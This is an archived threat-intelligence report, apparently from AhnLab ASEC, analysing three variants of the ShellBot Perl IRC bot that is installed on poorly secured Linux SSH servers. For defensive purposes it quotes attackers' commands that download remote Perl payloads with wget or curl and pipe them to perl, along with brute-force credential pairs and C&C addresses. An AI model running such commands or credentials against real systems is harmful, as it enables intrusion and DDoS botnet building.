{
	"id": "a09705e7-842b-49c8-a006-2b7c83658bb8",
	"created_at": "2026-04-06T00:15:46.381549Z",
	"updated_at": "2026-04-10T03:21:23.996033Z",
	"deleted_at": null,
	"sha1_hash": "b6cd0ec9bf5df882d7c995caa2d0c19caafca4a1",
	"title": "ShellBot Malware Being Distributed to Linux SSH Servers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1670370,
	"plain_text": "ShellBot Malware Being Distributed to Linux SSH Servers\r\nBy ATCP\r\nPublished: 2023-03-12 · Archived: 2026-04-05 21:40:06 UTC\r\nAhnLab Security Emergency response Center (ASEC) has recently discovered the ShellBot malware being\r\ninstalled on poorly managed Linux SSH servers. ShellBot, also known as PerlBot, is a DDoS Bot malware\r\ndeveloped in Perl and characteristically uses the IRC protocol to communicate with the C\u0026C server. ShellBot is an\r\nold malware that has been in steady use and is still being used today to launch attacks against Linux systems.\r\n1. Attack Campaigns Against Linux SSH Servers\r\nUnlike desktops, which are the main work environment for normal users, servers usually take charge of providing\r\nspecific services. Accordingly, malware attacks are typically carried out through web browsers or email\r\nattachments in desktop environments, and threat actors also distribute malware disguised as legitimate software to\r\ninduce users to install it. Threat actors attacking server environments use a different method since there are\r\nlimits to distributing malware in the ways mentioned above. Services that are poorly managed or are exposed to\r\nvulnerability exploitation because they have not been patched to the latest version are the prime targets.\r\nA main example of a poorly managed service is one where simple account credentials are used, causing the server\r\nto be vulnerable to dictionary attacks. Remote Desktop Protocol (RDP) and MS-SQL services are prime examples\r\nof attack vectors that are used when targeting Windows operating systems. On Linux servers, Secure Shell (SSH)\r\nservices are usually targeted for attacks. 
In IoT environments where an old Linux server or embedded Linux OS\r\nhas been installed, the Telnet service becomes the target of dictionary attacks.\r\nThe ShellBot malware strains that are going to be covered in this post are believed to have been installed after\r\nthreat actors used account credentials that had been obtained through the use of scanners and SSH BruteForce\r\nmalware on target systems. After scanning for systems with port 22 open, threat actors search for systems\r\nwhere the SSH service is active and use a list of commonly used SSH account credentials to initiate their\r\ndictionary attack. The following is a list of the actual account credentials used by threat actors who install\r\nShellBot. (A far greater number of account credentials were used in the actual attacks, but only the main examples\r\nwere organized here.)\r\nUser Password\r\ndeploy password\r\nhadoop hadoop\r\noracle oracle\r\nroot 11111\r\nroot Passw0rd\r\nttx ttx2011\r\nubnt ubnt\r\nTable 1. A portion of the account credentials used by ShellBot operators\r\nhttps://asec.ahnlab.com/en/49769/\r\nPage 1 of 9\n\n2. Internet Relay Chat (IRC) Protocol\r\nA characteristic of ShellBot, aside from the fact that it is developed in Perl, is that it uses the IRC protocol to\r\ncommunicate with C\u0026C servers. IRC is a real-time Internet chat protocol developed in 1988. Users log onto\r\ncertain channels of certain IRC servers and chat with other users who have logged onto the same channel in real\r\ntime.\r\nIRC Bot is a bot malware that abuses this IRC service to communicate with C\u0026C servers. 
The IRC Bot installed\r\non the infected system accesses an IRC server’s channel designated by the threat actor according to the IRC\r\nprotocol, after which it transmits stolen information to the specified channel, or when the attacker enters a\r\nparticular string, receives this as a command and performs the corresponding malicious behavior.\r\nIRC has long been used by malware because it relies on the preexisting IRC protocol and IRC servers\r\nwithout having to develop a separate C\u0026C server and protocol. Although it has been seeing less use by malware\r\ntargeting Windows operating systems, a large number of IRC Bots are still being distributed on Linux.\r\n3. ShellBot Analysis\r\nShellBot has been used by various threat actors for a considerable amount of time, and a previous ASEC Blog post\r\ncovered its use in attacks along with CoinMiners.\r\nAnother characteristic of ShellBot is that its variants all have different forms and features since threat actors can\r\ncustomize them. The team has categorized ShellBot into three main types based on recent findings and\r\nsummarized the commands, characteristics, and DDoS attacks the malware uses during installation.\r\n3.1. LiGhT’s Modded perlbot v2\r\nThe following is a ShellBot named “LiGhT’s Modded perlbot v2”.\r\nFigure 1. ShellBot version information\r\n“LiGhT’s Modded perlbot v2” is being used by a variety of threat actors. The following commands are used in the\r\nShellBot installation after the SSH server has been successfully logged into.\r\nFilename Installation Command\r\nak wget -qO - x-x-x[.]online/ak|perl\r\nperl\r\nnproc; nvidia-smi --list-gpus ;cd /tmp;wget -qO -\r\n http://34.225[.]57.146/futai/perl|perl;rm -rf perl\r\nmperl cd /tmp ; wget 193.233.202[.]219/mperl ; perl mperl ; rm -rf mperl\r\nniko2 cd /tmp ; wget 193.233.202[.]219/niko1 ; perl niko1 ; rm -rf niko1\r\nTable 2. 
Commands used to install LiGhT’s Modded perlbot v2\r\nConfiguration data such as the C\u0026C server and the name of the channel to join are included in the initial routine\r\nof ShellBot. A nickname with the format “IP-[5 random digits]” is used to join the IRC channels.\r\nFigure 2. Configuration data of ShellBot\r\nFilename C\u0026C URL Channel Name\r\nak 164.90.240[.]68:6667 #nou\r\nper 164.132.224[.]207:80 #mailbomb\r\nmperl 206.189.139[.]152:6667 #Q\r\nniko1 176.123.2[.]3:6667 #X\r\nTable 3. C\u0026C URL and channels of LiGhT’s Modded perlbot v2\r\nThe “LiGhT’s Modded perlbot v2” version of ShellBot offers various features, which are broadly categorized in the\r\ntable below. Commands that can actually be used for malicious purposes include DDoS commands such as TCP,\r\nUDP, and HTTP Flooding. It also includes a variety of commands that allow control over infected systems so that\r\nthey can be used in other attacks, such as reverse shell, log deletion, and scanner.\r\nCommand (Category) Description\r\nflooding IRC Flooding\r\nirc IRC control commands\r\nddos\r\nDDoS commands\r\nTCP, UDP, HTTP, SQL Flooding, etc.\r\nnews DDoS attack commands against security web pages\r\nhacking\r\nAttack commands\r\nMultiScan, Socks5, LogCleaner, Nmap, Reverse Shell, etc.\r\nlinuxhelp Help\r\nextras Additional features (Assumed to be related to DDoS attacks)\r\nversion Version information output\r\nTable 4. Features supported by LiGhT’s Modded perlbot v2\r\n3.2. DDoS PBot v2.0\r\nAside from “LiGhT’s Modded perlbot v2”, “DDoS PBot v2.0” is also being used in a variety of attacks. A\r\ncharacteristic of “DDoS PBot v2.0” is that it shows basic information and available commands in the comments\r\nthat can be seen during its initial routine.\r\nFigure 3. 
Initial routine of DDoS PBot v2.0\r\nThe following are commands used to install “DDoS PBot v2.0”.\r\nFilename Installation Command\r\nbash wget -qO - 80.94.92[.]241/bash|perl\r\ntest.jpg\r\nuname -a;wget -q -O- hxxp://185.161.208[.]234/test.jpg|perl;curl -sS\r\nhxxp://185.161.208[.]234/test.jpg|perl;nproc;history -c\r\ndred\r\nuname -a;lspci | grep -i --color 'vga|3d|2d';curl -s -L\r\nhxxp://39.165.53[.]17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred\r\nTable 5. Commands used to install DDoS PBot v2.0\r\n“DDoS PBot v2.0” randomly chooses a nickname from a selection of over 500, which include “abbore”, “ably”,\r\nand “abyss”, before joining an IRC channel.\r\nFigure 4. List of DDoS PBot v2.0 nicknames\r\nFilename C\u0026C URL Channel Name\r\nbash 51.195.42[.]59:8080 #sex\r\ntest.jpg gsm.ftp[.]sh:1080 #test\r\ndred 192.3.141[.]163:6667 #bigfalus\r\nTable 6. C\u0026C URL and channels of DDoS PBot v2.0\r\nRegular IRC Bots receive commands from the threat actor via the IRC channels to perform malicious\r\nacts. Thus, there is a need to verify the threat actor sending commands. Without a verification process, any user\r\ncould join the channel and control the bots however they want.\r\nTo do this, the IRC Bot performs an additional check: users that have joined the channel must\r\nverify their nickname and host address before they can enter a command. For example, in the case of the “bash”\r\nmalware, the nickname must be either “crond,” “drugs,” or “tab” as defined in the “admins” variable, while the\r\nhost address must be “localhost” as defined in the “hostauth” variable.\r\nFigure 5. 
Configuration data of DDoS PBot v2.0\r\nLike regular ShellBots, “DDoS PBot v2.0” also offers a variety of malicious commands, including DDoS attack\r\ncommands.\r\nCommand (Category) Description\r\nsystem Infected system information output\r\nversion Version information output\r\nchannel IRC control commands\r\nflood\r\nDDoS commands\r\nTCP, UDP, HTTP, SQL Flooding, etc.\r\nutils\r\nAttack commands\r\nPort Scan, Reverse Shell, file download, etc.\r\nTable 7. Features supported by DDoS PBot v2.0\r\n3.3. PowerBots (C) GohacK\r\nThe main characteristic of PowerBots is that it has a simpler form in comparison to the ShellBot types covered\r\nabove.\r\nFigure 6. Configuration data of PowerBots\r\nFilename Installation Command\r\nff uname -a ;wget -qO - hxxp://80.68.196[.]6/ff|perl \u0026\u003e\u003e/dev/null\r\nTable 8. Command used to install PowerBots\r\nFilename C\u0026C URL Channel Name\r\nff 49.212.234[.]206:3303 #x\r\nTable 9. C\u0026C URL and channel of DDoS PBot v2.0\r\nShellBot types usually offer a variety of DDoS attack features, but since PowerBots mainly focuses on its reverse\r\nshell and file downloading capabilities, it is likely that the threat actor installed ShellBot as a backdoor.\r\nCommand Description\r\nps Port scanning\r\nnamp NMAP port scanning\r\nrm Delete files in a particular path\r\nversion Version information output\r\ndown File download\r\nudp UDP Flooding attack\r\nback Reverse Shell\r\nTable 10. Features supported by PowerBots\r\n4. Conclusion\r\nRecently, threat actors have been installing variants of the ShellBot malware on inadequately managed Linux SSH\r\nservers. These types of attacks have been occurring consistently for a long time, and numerous attacks are still being\r\nconfirmed. 
If ShellBot is installed, Linux servers can be used as DDoS Bots for DDoS attacks against specific\r\ntargets after receiving a command from the threat actor. Moreover, the threat actor could use various other\r\nbackdoor features to install additional malware or launch different types of attacks from the compromised server.\r\nBecause of this, administrators should use passwords that are difficult to guess for their accounts and change them\r\nperiodically to protect the Linux server from brute force attacks and dictionary attacks, and apply the latest\r\npatches to prevent vulnerability attacks. Administrators should also use security programs such as firewalls for\r\nservers accessible from outside to restrict access by attackers. Finally, V3 should be updated to the latest version\r\nso that malware infection can be prevented.\r\nFile Detection\r\n– Shellbot/Perl.Generic.S1100 (2020.02.12.00)\r\n– Shellbot/Perl.Generic.S1118 (2020.02.19.07)\r\nMD5\r\n176ebfc431daa903ef83e69934759212\r\n2cf90bf5b61d605c116ce4715551b7a3\r\n3eef28005943fee77f48ac6ba633740d\r\n55e5bfa75d72e9b579e59c00eaeb6922\r\n6d2c754760ccd6e078de931f472c0f72\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//164[.]132[.]224[.]207/\r\nhttp[:]//164[.]90[.]240[.]68[:]6667/\r\nhttp[:]//176[.]123[.]2[.]3[:]6667/\r\nhttp[:]//185[.]161[.]208[.]234/test[.]jpg\r\nhttp[:]//192[.]3[.]141[.]163[:]6667/\r\nSource: https://asec.ahnlab.com/en/49769/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/49769/"
	],
	"report_names": [
		"49769"
	],
	"threat_actors": [],
	"ts_created_at": 1775434546,
	"ts_updated_at": 1775791283,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b6cd0ec9bf5df882d7c995caa2d0c19caafca4a1.pdf",
		"text": "https://archive.orkl.eu/b6cd0ec9bf5df882d7c995caa2d0c19caafca4a1.txt",
		"img": "https://archive.orkl.eu/b6cd0ec9bf5df882d7c995caa2d0c19caafca4a1.jpg"
	}
}